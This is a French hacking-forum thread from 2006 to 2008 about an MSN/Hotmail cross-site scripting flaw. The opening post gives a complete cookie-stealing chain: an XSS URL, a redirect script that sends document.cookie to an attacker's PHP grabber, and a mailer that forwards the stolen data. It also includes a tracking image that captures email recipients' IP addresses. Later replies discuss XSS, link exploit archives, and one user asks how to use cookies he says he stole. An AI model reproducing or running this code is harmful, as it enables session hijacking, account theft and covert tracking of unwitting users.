Tout d'abord, toute la Team Hackademy vous souhaite une année 2008 pleine de bonnes choses !

Pour débuter cette année, nous sommes heureux de vous annoncer que le Ezine commence à prendre forme (surtout l'équipe qui dirigera celui-ci) et devrait apparaitre sur le Web début Avril. Cela peut paraitre loin mais nous voulons vraiment faire un Ezine de qualité, cela demande donc beaucoup de préparation.

Pour ceux qui aimeraient publier dans le premier numéro il est encore temps d'envoyer vos articles (au pire il seront pour le prochain numéro) directement à redaction@thehackademy.net.

Autre annonce importante, le premier meeting HZV aura lieu le 16 Février 2008 sur Paris (dans les locaux de Sysdream). Celui-ci sera mensuel et aura pour concept de dispenser une formation d'environ 4h sur divers thèmes choisi par la communauté. Le premier thème abordé sera la sécurité VoIP et sera dispensé par CrashFr. Il vous est possible de réserver vos places en formulant votre demande sur meeting@thehackademy.net. Les meeting sont aussi l'occassion pour ceux qui n'auront pas la chance d'assister à la formation de faire des rencontres avec les autres membres de la communauté. Biensur ce meeting est ouvert à tous et gratuit (seul la limite de place disponible peut vous empecher l'accès; alors faites vite !).

Bonne année et n'oubliez pas: HZV will never die !

 FAQ - Rechercher  

Hotmail/MSN Multiples Vulnerability

 
The Hackademy Forum Index du Forum -> Advisories/Failles Poster un nouveau sujet   Ce sujet est verrouillé, vous ne pouvez pas éditer les messages ou faire de réponses.
Page 1 sur 1
Voir le sujet précédent :: Voir le sujet suivant  
Auteur Message
Invité
Message Posté le: Dim Aoû 27, 2006 3:24 am  |   Sujet du message: Hotmail/MSN Multiples Vulnerability Répondre en citant
Bonjour! Very Happy

1- Hotmail/MSN Cross Site Scripting Vulnerability
2- Hotmail/MSN IP.

1-
Exploit:

Citation:
http://newsletters.msn.com/xs-v3/insite.asp?CU=1&RE=')></script><script src=http://votre-site/redir.js>


--redir.js
Citation:
location.href='http://votre-site/cookie-grabber.php?cookie='+escape(document.cookie)


---cookie-grabber.php
Citation:
<?
$cookie = $_GET['cookie'];
$ip = getenv("REMOTE_ADDR");
$msg = "Cookie: $cookie\nIP Address: $ip";
$subject = "cookie";
mail("votremail@email.org", $subject, $msg);

header ("location: http://gouss95.free.fr/sss.bmp");
?>


----exploit.html
Citation:
<html>
<meta http-equiv="refresh" content="0; url=http://newsletters.msn.com/xs-v3/insite.asp?CU=1&RE=')></script><script src=http://votre-site/redir.js>"></html>


http://votre-site/exploit.html >> http://votre-site/redir.js >> http://votre-site/cookie-grabber.php >> votremail@email.org

Very Happy

2- Hotmail/MSN IP.
Reçevoir automatiquement l'IP d'une personne lorsque celle-ci ouvre votre mail,
vous devez simplement envoyez la ligne html ci-dessous et placée le fichier ip.php dans votre site web

--ip.php
Citation:
<?php
$ip = getenv("REMOTE_ADDR");
$msg = "By Olgiie\nIP Address: $ip";
$subject = "IP";
mail("votremail@hotmail.fr", $subject, $msg);

header ("location: http://gouss95.free.fr/sss.bmp");
?>


----Hotmail a envoyée a la personne
Citation:
<html>
<img src="http://votresite/ip.php"></img>
</html>


By Olgiie Very Happy
Revenir en haut
bozerty



Inscrit le: 05 Fév 2006
Messages: 172
Message Posté le: Dim Aoû 27, 2006 9:06 am  |   Sujet du message: Répondre en citant
Genialll ! on vas pouvoir piraté MSN !!! Youpi !!!

bon alors déjà je ne pense pas que tu sois dans la bonne section, parce que la XSS on peux pas dire que ça soit une méthode de hacking compliqué, il en est de même pour ton bout de code permetant de récupéré une IP, en plus je t'assure que c'est franchment pas nouveau Wink

en fait je suis pas sure que ça soit le forum adéquat pour poster ce genre de trucs ...
Revenir en haut
Voir le profil de l'utilisateur Envoyer un message privé Envoyer l'e-mail
Blwood



Inscrit le: 10 Fév 2006
Messages: 165
Message Posté le: Dim Aoû 27, 2006 11:43 am  |   Sujet du message: Répondre en citant
Il est vrai que ce n'est pas nouveau cet advisory =)

De passage :

Citation:
la XSS on peux pas dire que ça soit une méthode de hacking compliqué


Oooo l'insulte !! =) Les xss ou plutot l'injection javascript est une menace de plus en plus grandissante dans le web actuel =) ! Alors on respecte les xss on les renie pas Razz
_________________
<linux/kernel.h>
Revenir en haut
Voir le profil de l'utilisateur Envoyer un message privé
HolyGhost



Inscrit le: 13 Sep 2005
Messages: 452
Message Posté le: Dim Aoû 27, 2006 12:08 pm  |   Sujet du message: Répondre en citant
Le XSS n'est pas une faille prise au sérieux et c'est bien dommage.
C'est sûr que c'est pas non plus du HardCoding 1337 mais associé à l'ignorance des usagés, c'est bien souvent payant Twisted Evil
Il y a aussi du XSS bien plus poussé qui mérite considération.
Il ne faut pas croire que ça s'arrête à <script>alert("xss")</script>
J'ai été surpris de considérer des centaines de variations selon navigateur, langage et commande Shocked
Essayez donc ce petit challenge sympathique Wink
http://quickwired.com/kallahar/smallprojects/php_xss_filter_function.php
De plus, le XSS (bien qu'il se consacre essentiellement côté client) est le premier indice de failles multiples sur un script quelconque.
Voici quelques exemples qui réunissent XSS, SQL injection, disclosure et faille "Include" (la totale).
http://www.milw0rm.com/exploits/1547
et aussi un deuxième afin de confirmer l'évidence :
http://hamid.ir/security/alipager.txt
et une dernière qui (sur)confirme ++
http://www.milw0rm.com/exploits/1841
En d'autres termes, quand un script est mauvais, il est mauvais ++
Revenir en haut
Voir le profil de l'utilisateur Envoyer un message privé Envoyer l'e-mail
Blwood



Inscrit le: 10 Fév 2006
Messages: 165
Message Posté le: Dim Aoû 27, 2006 3:06 pm  |   Sujet du message: Répondre en citant
L'injection de Javascript peut mener très loin =) Patience pour le mag 5.
_________________
<linux/kernel.h>
Revenir en haut
Voir le profil de l'utilisateur Envoyer un message privé
system-erased



Inscrit le: 08 Juil 2006
Messages: 7
Message Posté le: Lun Aoû 28, 2006 1:53 pm  |   Sujet du message: Répondre en citant
commen decrypter les cookies !
ca a marché mais je sais pas les lire
Revenir en haut
Voir le profil de l'utilisateur Envoyer un message privé Envoyer l'e-mail
Celelibi



Inscrit le: 29 Mar 2006
Messages: 770
Message Posté le: Lun Aoû 28, 2006 2:47 pm  |   Sujet du message: Répondre en citant
system-erased a écrit:
commen decrypter les cookies !
ca a marché mais je sais pas les lire
Oué moi aussi je veux voler le compte d'un ami pour tester.
_________________
Il y a un boulet qui sommeille en chacun de nous. (enfin, surtout vous...)
Revenir en haut
Voir le profil de l'utilisateur Envoyer un message privé
system-erased



Inscrit le: 08 Juil 2006
Messages: 7
Message Posté le: Mar Aoû 29, 2006 2:55 pm  |   Sujet du message: Répondre en citant
J'ai essayé en modifiant mescookies, avec oracle, hkit, proxomytron et burps suit rien à faire....
Revenir en haut
Voir le profil de l'utilisateur Envoyer un message privé Envoyer l'e-mail
Kapt



Inscrit le: 05 Juil 2006
Messages: 21
Message Posté le: Ven Sep 08, 2006 11:30 pm  |   Sujet du message: Répondre en citant
bozerty a écrit:
bon alors déjà je ne pense pas que tu sois dans la bonne section, parce que la XSS on peux pas dire que ça soit une méthode de hacking compliqué


Bonjour,
Je me permet d'intervenir. Depuis quand le hacking doit être compliqué pour en être. Je ne comprends pas... Personnelement, pour moi, le hacking c'est le fait de passer outre les barrières de sécurité informatique par tous les moyens (compliqué, ou non).

Alors quand je vois écris cela, je me demande si tu te représente le hacking comme du hacking obligatoirement complexe...

Bref je n'ai pas compris ton raisonement bozerty.

+++
Revenir en haut
Voir le profil de l'utilisateur Envoyer un message privé Envoyer l'e-mail
ahmed534



Inscrit le: 28 Jan 2008
Messages: 1
Message Posté le: Lun Jan 28, 2008 3:39 pm  |   Sujet du message: Répondre en citant
system-erased a écrit:
commen decrypter les cookies !
ca a marché mais je sais pas les lire


Utiliser "HEADERs KIT": il contient un utilitaire de decriptage de cookies, mais franchement moi jl'ai cherché partout et je l'ai pas trouvé Sad (jlé vu sur un tuto en video)
Revenir en haut
Voir le profil de l'utilisateur Envoyer un message privé Envoyer l'e-mail
HacKSpideR



Inscrit le: 19 Juin 2007
Messages: 37
Message Posté le: Lun Jan 28, 2008 5:13 pm  |   Sujet du message: Répondre en citant
Le post date de deux ans ...
Revenir en haut
Voir le profil de l'utilisateur Envoyer un message privé Envoyer l'e-mail
m3ph
Admin forum/chat


Inscrit le: 11 Sep 2005
Messages: 485
Localisation: Région parisienne
Message Posté le: Mar Jan 29, 2008 8:34 am  |   Sujet du message: Répondre en citant
il a du faire une recherche sur "msn" lol

je lock.
_________________
Hacktivissement vôtre.

m3ph
Revenir en haut
Voir le profil de l'utilisateur Envoyer un message privé Visiter le site web du posteur
Montrer les messages depuis:   
The Hackademy Forum Index du Forum -> Advisories/Failles Poster un nouveau sujet   Ce sujet est verrouillé, vous ne pouvez pas éditer les messages ou faire de réponses.

 
Sauter vers:  

Powered by phpBB
Theme modified by mOg & CrashFr
Traduction par : phpBB-fr.com